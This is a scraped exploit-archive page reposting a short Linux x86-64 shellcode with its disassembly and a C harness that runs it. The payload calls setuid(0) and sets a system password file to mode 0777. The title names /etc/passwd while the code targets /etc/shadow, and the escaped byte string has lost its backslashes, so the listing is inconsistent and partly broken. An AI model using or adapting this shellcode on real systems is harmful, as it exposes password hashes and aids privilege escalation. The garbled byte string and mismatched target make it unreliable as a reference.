Home / os / win7

linux/x86-64 setuid(0) & chmod ("/etc/passwd",

Posted on 17 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>linux/x86-64 setuid(0) &amp; chmod (&quot;/etc/passwd&quot;, 0777) &amp; exit(0) 63 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================================================
linux/x86-64 setuid(0) &amp; chmod (&quot;/etc/passwd&quot;, 0777) &amp; exit(0) 63 bytes
=======================================================================


/*
Title:  Linux/x86-64 - setuid(0) &amp; chmod (&quot;/etc/passwd&quot;, 0777) &amp; exit(0) - 63 bytes
Date:   2010-06-17
Tested: Archlinux x86_64 k2.6.33
 
Author: Jonathan Salwan
Web:    http://shell-storm.org | http://twitter.com/shell_storm
 
! Dtabase of shellcodes http://www.shell-storm.org/shellcode/
 
 
 
  &lt;-- _setuid(0) --&gt;
  400078:   48 31 ff                xor    %rdi,%rdi
  40007b:   48 31 c0                xor    %rax,%rax
  40007e:   b0 69                   mov    $0x69,%al
  400080:   0f 05                   syscall
 
  &lt;-- _chmod(&quot;/etc/shadow&quot;, 0777) --&gt;
  400082:   48 31 d2                xor    %rdx,%rdx
  400085:   66 be ff 01             mov    $0x1ff,%si
  400089:   48 bb ff ff ff ff ff    mov    $0x776f64ffffffffff,%rbx
  400090:   64 6f 77
  400093:   48 c1 eb 28             shr    $0x28,%rbx
  400097:   53                      push   %rbx
  400098:   48 bb 2f 65 74 63 2f    mov    $0x6168732f6374652f,%rbx
  40009f:   73 68 61
  4000a2:   53                      push   %rbx
  4000a3:   48 89 e7                mov    %rsp,%rdi
  4000a6:   48 31 c0                xor    %rax,%rax
  4000a9:   b0 5a                   mov    $0x5a,%al
 
  &lt;-- _exit(0) --&gt;
  4000ab:   0f 05                   syscall
  4000ad:   48 31 ff                xor    %rdi,%rdi
  4000b0:   48 31 c0                xor    %rax,%rax
  4000b3:   b0 3c                   mov    $0x3c,%al
  4000b5:   0f 05                   syscall
*/
 
#include &lt;stdio.h&gt;
 
 
char *SC =  &quot;x48x31xffx48x31xc0xb0x69x0fx05&quot;
            &quot;x48x31xd2x66xbexffx01x48xbbxff&quot;
            &quot;xffxffxffxffx64x6fx77x48xc1xeb&quot;
            &quot;x28x53x48xbbx2fx65x74x63x2fx73&quot;
            &quot;x68x61x53x48x89xe7x48x31xc0xb0&quot;
            &quot;x5ax0fx05x48x31xffx48x31xc0xb0&quot;
            &quot;x3cx0fx05&quot;;
 
int main(void)
{
        fprintf(stdout,&quot;Length: %d
&quot;,strlen(SC));
        (*(void(*)()) SC)();
return 0;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :